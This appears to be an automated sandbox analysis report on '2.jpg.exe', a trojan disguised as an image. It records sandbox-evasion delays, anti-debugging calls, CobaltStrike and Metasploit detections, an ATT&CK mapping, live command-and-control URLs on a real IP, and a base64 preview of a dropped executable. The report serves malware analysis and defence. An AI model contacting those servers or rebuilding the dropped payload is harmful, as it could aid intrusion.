Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -599324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597349s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -597001s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7368	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe TID: 7304	Thread sleep time: -595719s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_067647C9 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_067647C9
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_067691F0 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,		0_2_067691F0

Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99657	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99287	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99953	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99844	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99610	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599324	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597349	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 597001	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Thread delayed: delay time: 595719	Jump to behavior

Source: 2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: 2.jpg.exe, 00000000.00000002.4125543545.0000000005D0A000.00000004.00000020.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4125543545.0000000005D16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\2.jpg.exe

API call chain: ExitProcess graph end node

graph_0-36959

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_0677949D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0677949D

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06761FAA GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_06761FAA

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06769641 mov eax, dword ptr fs:[00000030h]	0_2_06769641
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0676A2E1 mov eax, dword ptr fs:[00000030h]	0_2_0676A2E1
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0636971E mov eax, dword ptr fs:[00000030h]	0_2_0636971E
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06368A7E mov eax, dword ptr fs:[00000030h]	0_2_06368A7E

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06767E66 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree,

0_2_06767E66

Source: C:\Users\user\Desktop\2.jpg.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0677F4F0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0677F4F0
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0677949D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0677949D
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0677D2CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0677D2CE

Source: C:\Users\user\Desktop\2.jpg.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_0676B9E9 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_0676B9E9

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_0676BBA5 GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0676BBA5

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: GetLocaleInfoA,

0_2_0678351D

Source: C:\Users\user\Desktop\2.jpg.exe

Queries volume information: C:\Users\user\Desktop\2.jpg.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06763801 CreateNamedPipeA,

0_2_06763801

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06785E40 GetSystemTimeAsFileTime,

0_2_06785E40

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06766C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_06766C99

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06766C99 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,

0_2_06766C99

Source: C:\Users\user\Desktop\2.jpg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Metasploit Payload

Source: Yara match	File source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0676BFB7 socket,closesocket,htons,bind,listen,	0_2_0676BFB7
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0676725B socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_0676725B
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0676733D htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_0676733D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	21 Access Token Manipulation	13 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Process Injection	22 Software Packing	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2.jpg.exe	18%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
2.jpg.exe	20%	Virustotal		Browse
2.jpg.exe	100%	Avira	TR/Dropper.MSIL.Gen
2.jpg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
http://8.218.236.5:8089/1.txt	0%	Virustotal	Browse
http://8.218.236.5/	0%	Virustotal	Browse
http://8.218.236.5:8089/1.txtd	0%	Virustotal	Browse
http://8.218.236.5:8062/g.pixel	0%	Virustotal	Browse
http://8.218.236.5:8089/0.txtP	0%	Virustotal	Browse
http://8.218.236.5:8062/j9sF	0%	Virustotal	Browse
http://8.218.236.5:8089/1.txter	0%	Virustotal	Browse
http://8.218.236.5:8089/1.txtP	0%	Virustotal	Browse
http://8.218.236.5:8089	0%	Virustotal	Browse
http://8.218.236.5:8089/0.txt	0%	Virustotal	Browse
http://8.218.236.5:8089/0.txtC	0%	Virustotal	Browse
http://8.218.236.5/j9sF	0%	Virustotal	Browse

Name	Malicious	Antivirus Detection	Reputation
http://8.218.236.5:8089/1.txt	true	0%, Virustotal, Browse	unknown
http://8.218.236.5:8062/g.pixel	true	0%, Virustotal, Browse	unknown
http://8.218.236.5:8062/j9sF	true	0%, Virustotal, Browse	unknown
http://8.218.236.5:8089/0.txt	true	0%, Virustotal, Browse	unknown
http://8.218.236.5/j9sF	true	0%, Virustotal, Browse	unknown
http://8.218.236.5:None/j9sF	true		low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://8.218.236.5:8062/g.pixelHeartbeatTimesg	2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8062/j9sF6	2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8062/g.pixelnkMonitoringM	2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8089	2.jpg.exe, 00000000.00000002.4124836777.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://8.218.236.5:8089/0.txtlB	2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8089/1.txtd	2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://8.218.236.5/	2.jpg.exe, 00000000.00000002.4124429713.0000000000A17000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://8.218.236.5:8062/g.pixelitoringKillbit	2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8062/g.pixelitoringKillbitS	2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.218.236.5:8089/0.txtP	2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://8.218.236.5:8089/1.txtP	2.jpg.exe, 00000000.00000002.4124836777.00000000026C1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://8.218.236.5:8089/1.txter	2.jpg.exe, 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://127.0.0.1:%u/	2.jpg.exe, 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	false		low
http://8.218.236.5:8062/g.pixelnkMonitoringx	2.jpg.exe, 00000000.00000002.4124429713.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://8.218.236.5:8089/0.txtC	2.jpg.exe	false	0%, Virustotal, Browse	unknown
http://8.218.236.5:8089t-	2.jpg.exe, 00000000.00000002.4124836777.000000000268F000.00000004.00000800.00020000.00000000.sdmp	false		low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.218.236.5	unknown	Singapore		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428599
Start date and time:	2024-04-19 09:49:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2.jpg.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 27 Number of non-executed functions: 130
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:49:57	API Interceptor	11806803x Sleep call for process: 2.jpg.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	http://www.sushi-idea.com	Get hash	malicious	Unknown	Browse	47.246.136.185
	SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exe	Get hash	malicious	Unknown	Browse	47.243.79.202
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	47.91.88.207
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	47.91.88.207
	4XAsw9FSr5.elf	Get hash	malicious	Unknown	Browse	47.241.21.33
	rc21AW1MZD.elf	Get hash	malicious	Mirai	Browse	8.220.102.72
	hYN45tzxwl.elf	Get hash	malicious	Mirai	Browse	8.218.15.223
	aga94GHd1L.elf	Get hash	malicious	Mirai	Browse	47.252.147.82
	16rBksY5gH.elf	Get hash	malicious	Mirai	Browse	8.222.72.244
	iZYqP2K1UC.elf	Get hash	malicious	Mirai	Browse	47.88.168.103

Process:	C:\Users\user\Desktop\2.jpg.exe
File Type:	ASCII text, with very long lines (10240), with no line terminators
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.330796419787758
Encrypted:	false
SSDEEP:	192:IGBG1sUyhybD+x2w37Q60vpogL0FkipchBon4bW1x:63bpCdGNn9i4bWP
MD5:	C18D34950C61E3135D02BB5E3A1D1375
SHA1:	131A853AE43FE8B4BDCDB8A13B87674346559A83
SHA-256:	0CBDFFEDC6E8C2C8D93F2AB60ADEFBA94AA4E7DF877ECE37F759E2320B6A6A86
SHA-512:	8A4CF8010FF89DDE81B7F4D24978377B216B001A9D77917CFAAFA673CEDF6728F7ADD5CC510FF92AC74350826AA482A9583733727ADAD0147253F67951053A9D
Malicious:	false
Reputation:	low
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAI4iuo8AAAAAAAAAAOAAIiALATAAABYAAAAGAAAAAAAA5jQAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJM0AABPAAAAAEAAAFgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAMNAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA7BQAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAFgDAAAAQAAAAAQAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADHNAAAAAAAAEgAAAACAAUAqCMAAGQQAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAgA3AAAAAQAAERIAKBQAAAp9BAAABBIAA30FAAAEEgAVfQMAAAQSAHwEAAAEEgAoAQAAKxIAfAQAAAQoFgAACioAGzADAIYAAAACAAARAigXAAAKChQLKBgAAAoMCANvGQAACggEbxoAAAoICG8bAAAKCG8cAAAKbx0AAAoNBnMeAAAKEwQRBAkWcx8AAAoTBREFcyAAAAoTBhEG

C:\Users\user\Desktop\localfile_638491175959284389.txt

Download File

Process:	C:\Users\user\Desktop\2.jpg.exe
File Type:	ASCII text, with very long lines (1474), with no line terminators
Category:	modified
Size (bytes):	1474
Entropy (8bit):	6.048107885381353
Encrypted:	false
SSDEEP:	24:Xlgfx8/wEFHRnQwodcCwy+soGAZOPBnRgdIAv2CZ5pGL3yzJWvMOt:XefxNaJ/CwDsoGi2HgWAeI5pGLkJEMI
MD5:	D157954F9B5A1A1F3AEFDA17BCD64009
SHA1:	E7B862202083FF3391608070BDBCCD8367A3F0BF
SHA-256:	B82A2F207B71A4631A609670259A96EFC62F00CDD53F262946FD703238AD61A6
SHA-512:	98AEF2172EE38BC530704F77BE483EDD6CB735134B454CFBFD2F77F7DCAA9FDC53937ADEC0CA881E798C12F8CF034B97838AE6DB35C4461E1BE8A9F857E43831
Malicious:	false
Reputation:	low
